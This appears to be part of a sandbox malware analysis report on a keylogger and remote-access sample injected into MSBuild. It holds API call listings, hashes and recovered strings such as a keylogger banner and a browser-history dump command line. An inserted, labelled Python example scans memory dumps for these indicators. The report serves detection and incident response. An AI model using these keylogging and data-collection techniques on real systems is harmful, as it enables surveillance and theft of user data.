• SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FBA
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
• Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
• Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
• Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
• GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Process$CloseHandleOpen$FileImageName
• String ID:
• API String ID: 2951400881-0
• Opcode ID: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
• Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
• Opcode Fuzzy Hash: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
• Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
APIs
• lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
• lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
• lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
• lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
• lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: lstrlen$lstrcat
• String ID:
• API String ID: 493641738-0
• Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
• Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
• Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
• Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
APIs
• _free.LIBCMT ref: 100091D0
  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
• _free.LIBCMT ref: 100091E2
• _free.LIBCMT ref: 100091F4
• _free.LIBCMT ref: 10009206
• _free.LIBCMT ref: 10009218
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
• Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
• Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
• Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
APIs
• _free.LIBCMT ref: 0044F7B5
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
• _free.LIBCMT ref: 0044F7C7
• _free.LIBCMT ref: 0044F7D9
• _free.LIBCMT ref: 0044F7EB
• _free.LIBCMT ref: 0044F7FD
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
• Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
• Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
• Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
APIs
• _free.LIBCMT ref: 1000536F
  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
• _free.LIBCMT ref: 10005381
• _free.LIBCMT ref: 10005394
• _free.LIBCMT ref: 100053A5
• _free.LIBCMT ref: 100053B6
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
• Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
• Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
• Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
APIs
• _free.LIBCMT ref: 00443305
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
• _free.LIBCMT ref: 00443317
• _free.LIBCMT ref: 0044332A
• _free.LIBCMT ref: 0044333B
• _free.LIBCMT ref: 0044334C
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
• Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
• Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
• Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• String ID: u;~/
APIs
• GetWindowThreadProcessId.USER32(?,?), ref: 00416768
• GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
• IsWindowVisible.USER32(?), ref: 004167A1
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• API ID: ProcessWindow$Open$TextThreadVisible
• String ID: (FG
APIs
• GetKeyboardLayoutNameA.USER32(?), ref: 00409601
  • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
  • Part of subcall function 0040428C: connect.WS2_32(?,00F1A798,00000010), ref: 004042A5
  • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
  • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• API ID: CreateFileKeyboardLayoutNameconnectsendsocket
• String ID: XCG$`AG$>G
APIs
• _free.LIBCMT ref: 00451D30
  • Part of subcall function 00451B20: __alloca_probe_16.LIBCMT ref: 00451B89
  • Part of subcall function 00451B20: WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00451BE6
  • Part of subcall function 00451B20: __freea.LIBCMT ref: 00451BEF
• _free.LIBCMT ref: 00451C86
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
• GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00451CC1
  • Part of subcall function 00448706: HeapAlloc.KERNEL32(00000008,0000000A,00000000,?,00446F74,00000001,00000364,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000,?), ref: 00448747
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• API ID: ErrorHeapLast_free$AllocByteCharFreeMultiWide__alloca_probe_16__freea
• String ID: u;~/
APIs
• GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• API ID: Info
• String ID: $fD$u;~/
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 10004C1D
• _free.LIBCMT ref: 10004CE8
• _free.LIBCMT ref: 10004CF2
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,00000000,00000000,?,?,0044A885,?,00000000,00000000), ref: 0044A5D9
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,0044A885,?,00000000,00000000,00000000,00000000,0000000C,00000000,0043B9C4,?), ref: 0044A607
• GetLastError.KERNEL32(?,0044A885,?,00000000,00000000,00000000,00000000,0000000C,00000000,0043B9C4,?,00000000,?,?,00000000,?), ref: 0044A638
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• API ID: ByteCharErrorFileLastMultiWideWrite
• String ID: u;~/
APIs
• __alloca_probe_16.LIBCMT ref: 00451B89
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00451BE6
• __freea.LIBCMT ref: 00451BEF
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Similarity
• API ID: ByteCharMultiWide__alloca_probe_16__freea
• String ID: u;~/
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76E23530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
• String ID: /sort "Visit Time" /stext "$8>G
• API String ID: 368326130-2663660666
• Opcode ID: 03d025f5093637cf68c7e3e5187cd53dd33040ecfd3fb4839ff056847571c0a6
• Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
• Opcode Fuzzy Hash: 03d025f5093637cf68c7e3e5187cd53dd33040ecfd3fb4839ff056847571c0a6
• Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
APIs
• _free.LIBCMT ref: 004481DD
• _free.LIBCMT ref: 00448233
  • Part of subcall function 0044800F: _free.LIBCMT ref: 00448067
  • Part of subcall function 0044800F: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
  • Part of subcall function 0044800F: WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
  • Part of subcall function 0044800F: WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: _free$ByteCharMultiWide$InformationTimeZone
• String ID: u;~/
• API String ID: 314583886-1979702588
• Opcode ID: d03f4a1b80500958f891a3cbcf706bb6a5bc2e9501f696f47c91c4298fadc783
• Instruction ID: 199b356aa642283adb8c254b31611cf5f7507bdd3411797779e7419f4dff9485
• Opcode Fuzzy Hash: d03f4a1b80500958f891a3cbcf706bb6a5bc2e9501f696f47c91c4298fadc783
• Instruction Fuzzy Hash: 6C213B72800518A7EB31A7259C41DEFB778EB83364F1102EFF899B2181DF784D86859A
APIs
• GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
• wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: EventLocalTimewsprintf
• String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
• API String ID: 1497725170-1359877963
• Opcode ID: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
• Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
• Opcode Fuzzy Hash: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
• Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
APIs
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
• CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
• CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTime$wsprintf
• String ID: Online Keylogger Started
• API String ID: 112202259-1258561607
• Opcode ID: c0aab962c7ca1211a7ad70a8f3b20d3c2f1fab31e78c15f9791034d849591584
• Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
• Opcode Fuzzy Hash: c0aab962c7ca1211a7ad70a8f3b20d3c2f1fab31e78c15f9791034d849591584
• Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
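The strings recovered in the listings above are the kind of indicator a responder hunts for in a memory dump of the injected MSBuild process: the "Online Keylogger Started" banner written when the three keylogger threads are created, the NirSoft-style `/sort "Visit Time" /stext ` command line used to dump browser history to a text file, and the wsprintfW format string that prefixes each keylog entry with a local timestamp. The Python below is an added example, not part of the Joe Sandbox report or of the sample; it scans a constructed dump buffer for those strings in both ANSI and UTF-16LE form (the *W APIs in the listings mean wide strings are likely, and the `$` in the report's "String ID" fields separates two strings, so `]` is a separate fragment) and parses keylog entries whose prefix follows the format string. The dump bytes and the keylog line are constructed; what sits between the timestamp and the closing `]` is an assumption, since the report shows only the two fragments.

```python
"""Scan a memory dump for Remcos keylogger/collector indicator strings.

Added example. Indicator strings come from the "String ID" fields of the
sandbox report; the dump buffer and keylog text below are constructed.
"""
import re
from dataclasses import dataclass

# Indicator strings as they appear in the report. wsprintfW and the other
# *W APIs in the listings mean they may sit in memory as UTF-16LE, so each
# string is searched in both ANSI and wide form.
INDICATORS = {
    "keylogger_banner": "Online Keylogger Started",
    "keylog_timestamp_fmt": "[%04i/%02i/%02i %02i:%02i:%02i ",
    "nirsoft_history_cmdline": '/sort "Visit Time" /stext ',
    "connection_timeout": "Connection Timeout",
}


@dataclass(frozen=True)
class Hit:
    name: str      # key in INDICATORS
    offset: int    # byte offset of the match in the dump
    encoding: str  # "ansi" or "utf-16le"


def needles(s: str) -> dict[str, bytes]:
    """Both byte encodings a Windows binary may hold for an ASCII string."""
    return {"ansi": s.encode("latin-1"), "utf-16le": s.encode("utf-16-le")}


def scan(buf: bytes) -> list[Hit]:
    """Return every indicator occurrence in buf, ordered by offset."""
    hits: list[Hit] = []
    for name, s in INDICATORS.items():
        for enc, needle in needles(s).items():
            start = 0
            while (pos := buf.find(needle, start)) != -1:
                hits.append(Hit(name, pos, enc))
                start = pos + 1
    return sorted(hits, key=lambda h: h.offset)


def matched_indicators(buf: bytes) -> set[str]:
    """Distinct indicator names present in buf (for triage/scoring)."""
    return {h.name for h in scan(buf)}


# Regex derived from the wsprintfW format string: "[YYYY/MM/DD HH:MM:SS ".
# The report lists "]" as a separate fragment; the text between timestamp
# and "]" is not shown on the page, so it is matched loosely (assumption).
KEYLOG_ENTRY = re.compile(
    r"\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) ([^\]]*)\]"
)


def parse_keylog_entries(text: str) -> list[tuple[str, str]]:
    """Return (ISO-8601 timestamp, trailing text) for each keylog header."""
    return [
        (f"{y}-{mo}-{d}T{h}:{mi}:{s}", rest.strip())
        for y, mo, d, h, mi, s, rest in KEYLOG_ENTRY.findall(text)
    ]


def build_sample_dump() -> bytes:
    """Constructed dump: wide banner, ANSI NirSoft cmdline, wide format string."""
    return (
        b"\x00" * 64
        + "Online Keylogger Started".encode("utf-16-le")          # offset 64
        + b"\x00" * 16
        + b'/sort "Visit Time" /stext '                            # offset 128
        + b"\x00" * 8
        + "[%04i/%02i/%02i %02i:%02i:%02i ".encode("utf-16-le")   # offset 162
        + "]".encode("utf-16-le")
        + b"\xcc" * 32
    )


if __name__ == "__main__":
    for hit in scan(build_sample_dump()):
        print(f"{hit.offset:#010x} {hit.encoding:<9} {hit.name}")
    print(parse_keylog_entries("[2024/12/13 10:22:05 Untitled - Notepad]hello"))
```

Searching both encodings matters: a YARA rule or grep that looks only for the ANSI form misses every string the binary built or stored with the wide APIs seen in the listings, and the constructed dump above deliberately mixes the two.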
APIs
• CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
• GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
• __dosmaperr.LIBCMT ref: 0044AAFE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID: `@
• API String ID: 2583163307-951712118
• Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
• Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
• Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
• Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
APIs
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
• CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
• SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CloseEventHandleObjectSingleWait
• String ID: Connection Timeout
• API String ID: 2055531096-499159329
• Opcode ID: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
• Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
• Opcode Fuzzy Hash: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
• Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
